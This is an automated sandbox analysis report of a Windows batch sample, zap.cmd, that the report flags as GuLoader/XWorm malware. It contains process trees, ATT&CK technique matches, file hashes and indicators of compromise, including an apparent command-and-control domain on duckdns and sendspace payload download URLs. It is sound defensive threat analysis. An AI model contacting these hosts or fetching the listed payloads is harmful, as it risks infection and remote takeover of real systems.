               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
               Source: wab.exe, 0000000C.00000002.3377119425.0000000025609000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
               Source: C:\Program Files (x86)\Windows Mail\wab.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

               Source: Yara match, File source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: Process Memory Space: wab.exe PID: 2948, type: MEMORYSTR

              Remote Access Functionality

               Source: Yara match, File source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match, File source: Process Memory Space: wab.exe PID: 2948, type: MEMORYSTR
               MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count the report shows next to a matched technique; techniques without a number are the matrix's unmatched cells):

               Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
               Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
               Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
               Execution: Windows Management Instrumentation (111), Command and Scripting Interpreter (11), PowerShell (1), Cron, Launchd, Scheduled Task, Systemd Timers
               Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
               Privilege Escalation: Process Injection (112), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
               Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (141), Process Injection (112), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1)
               Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
               Discovery: Security Software Discovery (131), Process Discovery (2), Virtualization/Sandbox Evasion (141), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (14), Remote System Discovery
               Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
               Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
               Command and Control: Encrypted Channel (11), Non-Standard Port (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (213), Multiband Communication, Commonly Used Port
               Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
               Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
               Behavior Graph ID: 1446788, Sample: zap.cmd, Startdate: 23/05/2024, Architecture: WINDOWS, Score: 100
               Sample-level DNS/IP nodes: tbsagyw.duckdns.org (Uses dynamic DNS services); www.sendspace.com; 2 other IPs or domains
               Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
               Process tree (numbers after a process name are the counters the graph shows on that node):
               cmd.exe 1 (started)
                 signatures: Suspicious powershell command line found; Very long command line found
                 powershell.exe 14 23 (started)
                   DNS/IP: fs03n1.sendspace.com 69.31.136.17, 443, 49712, 49721 GTT-BACKBONEGTTDE United States; www.sendspace.com 104.21.28.80, 443, 49711, 49720 CLOUDFLARENETUS United States
                   signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                   powershell.exe 17 (started)
                     signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                     wab.exe 14 (started)
                       DNS/IP: tbsagyw.duckdns.org 12.202.180.134, 49724, 8896 FISERV-INCUS United States
                     cmd.exe 1 (started)
                   conhost.exe (started)
                   cmd.exe 1 (started)
                 conhost.exe (started)

               Source | Detection | Scanner | Label | Link
               zap.cmd | 3% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://fs03n1.sendspace.com/v | 0% | Avira URL Cloud | safe
https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com/y | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/jj4uw4P | 0% | Avira URL Cloud | safe
https://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/jj4uw4 | 0% | Avira URL Cloud | safe
http://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin | 0% | Avira URL Cloud | safe
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/ug8lu5 | 0% | Avira URL Cloud | safe
https://www.sendspace.com/%I8V | 0% | Avira URL Cloud | safe
tbsagyw.duckdns.org | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/jj4uw4XR | 0% | Avira URL Cloud | safe
https://fs03n4.sendspaX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n4.sendspace.com | 69.31.136.17 | true | false | - | unknown
tbsagyw.duckdns.org | 12.202.180.134 | true | true | - | unknown
www.sendspace.com | 104.21.28.80 | true | false | - | unknown
fs03n1.sendspace.com | 69.31.136.17 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/jj4uw4 | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin | false | Avira URL Cloud: safe | unknown
tbsagyw.duckdns.org | true | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/ug8lu5 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000003.00000002.2727560719.0000024C58BE2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n1.sendspace.com/ | wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/jj4uw4P | powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com | powershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku | wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C5906B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspace.com/v | wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspace.com/y | wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs03n4.sendspace.com | powershell.exe, 00000003.00000002.2727560719.0000024C5956B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/%I8V | wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/jj4uw4XR | powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspaX | powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n4.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
12.202.180.134 | tbsagyw.duckdns.org | United States | 22983 | FISERV-INCUS | true
104.21.28.80 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446788
                      Start date and time:2024-05-23 21:11:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:zap.cmd
                      Detection:MAL
                      Classification:mal100.troj.evad.winCMD@13/9@4/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 5092 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: zap.cmd
Time | Type | Description
15:12:11 | API Interceptor | 6496x Sleep call for process: powershell.exe modified
15:13:04 | API Interceptor | 334811x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
Match: 69.31.136.17
  xff.cmd | malicious | GuLoader, XWorm
  las.cmd | malicious | GuLoader
  zap.cmd | malicious | GuLoader, XWorm
  xff.cmd | malicious | AsyncRAT, GuLoader
  new.cmd | malicious | GuLoader
  las.cmd | malicious | GuLoader
  zap.cmd | malicious | GuLoader, XWorm
  kam.cmd | malicious | GuLoader
  upload.vbs | malicious | GuLoader, XWorm
  update.vbs | malicious | GuLoader, XWorm
Match: 12.202.180.134
  xff.cmd | malicious | GuLoader, XWorm
  zap.cmd | malicious | Unknown
  zap.cmd | malicious | GuLoader, XWorm
  update.cmd | malicious | Unknown
  xff.cmd | malicious | AsyncRAT, GuLoader
  new.cmd | malicious | GuLoader
  las.cmd | malicious | GuLoader
  kam.cmd | malicious | Unknown
  sample.cmd | malicious | Unknown
  zap.cmd | malicious | GuLoader, XWorm
Match: 104.21.28.80
  xff.cmd | malicious | GuLoader, XWorm
  xff.cmd | malicious | AsyncRAT, GuLoader
  zap.cmd | malicious | GuLoader, XWorm
  las.cmd | malicious | GuLoader
  kam.cmd | malicious | GuLoader
  upload.vbs | malicious | GuLoader, XWorm
  update.vbs | malicious | GuLoader, XWorm
  file.vbs | malicious | GuLoader
  windows.vbs | malicious | AsyncRAT, GuLoader
  update.vbs | malicious | GuLoader
Match | Associated Sample Name / URL | Detection | Threat Name | Context (bulleted below each row)
Match: fs03n1.sendspace.com
  new.cmd | malicious | GuLoader
  • 69.31.136.17
  upload.vbs | malicious | GuLoader, XWorm
  • 69.31.136.17
  windows.vbs | malicious | AsyncRAT, GuLoader
  • 69.31.136.17
  windows.vbs | malicious | GuLoader, XWorm
  • 69.31.136.17
Match: fs03n4.sendspace.com
  xff.cmd | malicious | GuLoader, XWorm
  • 69.31.136.17
  new.cmd | malicious | GuLoader
  • 69.31.136.17
  las.cmd | malicious | GuLoader
  • 69.31.136.17
  kam.cmd | malicious | GuLoader
  • 69.31.136.17
  1st_Payment.vbs | malicious | Revenge
  • 69.31.136.17
Match: www.sendspace.com
  xff.cmd | malicious | GuLoader, XWorm
  • 104.21.28.80
  las.cmd | malicious | GuLoader
  • 172.67.170.105
  zap.cmd | malicious | GuLoader, XWorm
  • 172.67.170.105
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 104.21.28.80
  new.cmd | malicious | GuLoader
  • 172.67.170.105
  las.cmd | malicious | GuLoader
  • 172.67.170.105
  kam.cmd | malicious | GuLoader
  • 172.67.170.105
  zap.cmd | malicious | GuLoader, XWorm
  • 104.21.28.80
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 172.67.170.105
  las.cmd | malicious | GuLoader, XWorm
  • 172.67.170.105
Match | Associated Sample Name / URL | Detection | Threat Name | Context (bulleted below each row)
Match: CLOUDFLARENETUS
  bas.cmd | malicious | Unknown
  • 104.16.231.132
  xff.cmd | malicious | GuLoader, XWorm
  • 104.21.28.80
  las.cmd | malicious | GuLoader
  • 172.67.170.105
  https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQ | malicious | HTMLPhisher
  • 104.17.2.184
  https://equifax.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=twn_noreply%40equifax.com&p=d5b52cbc-0569-42e0-86cf-8416889c1b1d#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fd5b52cbc-0569-42e0-86cf-8416889c1b1d%2Fdata%2Fmetadata&dk=CSTBBNbTEYumPZCavpjONtXXrHKWZsLJITyIS27OqaA%3D | malicious | Unknown
  • 104.16.117.116
  zap.cmd | malicious | GuLoader, XWorm
  • 172.67.170.105
  https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D | malicious | Unknown
  • 104.17.3.184
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 104.21.28.80
  new.cmd | malicious | GuLoader
  • 172.67.170.105
  las.cmd | malicious | GuLoader
  • 172.67.170.105
Match: GTT-BACKBONEGTTDE
  xff.cmd | malicious | GuLoader, XWorm
  • 69.31.136.57
  las.cmd | malicious | GuLoader
  • 69.31.136.57
  zap.cmd | malicious | GuLoader, XWorm
  • 69.31.136.57
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 69.31.136.57
  new.cmd | malicious | GuLoader
  • 69.31.136.57
  las.cmd | malicious | GuLoader
  • 69.31.136.17
  kam.cmd | malicious | GuLoader
  • 69.31.136.53
  zap.cmd | malicious | GuLoader, XWorm
  • 69.31.136.53
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 69.31.136.53
  las.cmd | malicious | GuLoader, XWorm
  • 69.31.136.53
Match: FISERV-INCUS
  xff.cmd | malicious | GuLoader, XWorm
  • 12.202.180.134
  zap.cmd | malicious | Unknown
  • 12.202.180.134
  zap.cmd | malicious | GuLoader, XWorm
  • 12.202.180.134
  update.cmd | malicious | Unknown
  • 12.202.180.134
  xff.cmd | malicious | AsyncRAT, GuLoader
  • 12.202.180.134
  new.cmd | malicious | GuLoader
  • 12.202.180.134
  las.cmd | malicious | GuLoader
  • 12.202.180.134
  kam.cmd | malicious | Unknown
  • 12.202.180.134
  sample.cmd | malicious | Unknown
  • 12.202.180.134
  zap.cmd | malicious | GuLoader, XWorm
  • 12.202.180.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | xff.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.17
 | new.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | filePY.cmd | malicious | Unknown | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | kam.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | xff.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.17
 | new.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
No context
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.8908305915084105
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:NlllulBiPlllZ:NllUUd
                                                                                  MD5:2C728892207486CD886F1A3557B47848
                                                                                  SHA1:673A0EF98F6F703E7A95ECB62A403AF0F7290CA8
                                                                                  SHA-256:986058A667E62EE45B9A966E20CC456D2562E0C40544F251158265AABC2D84F5
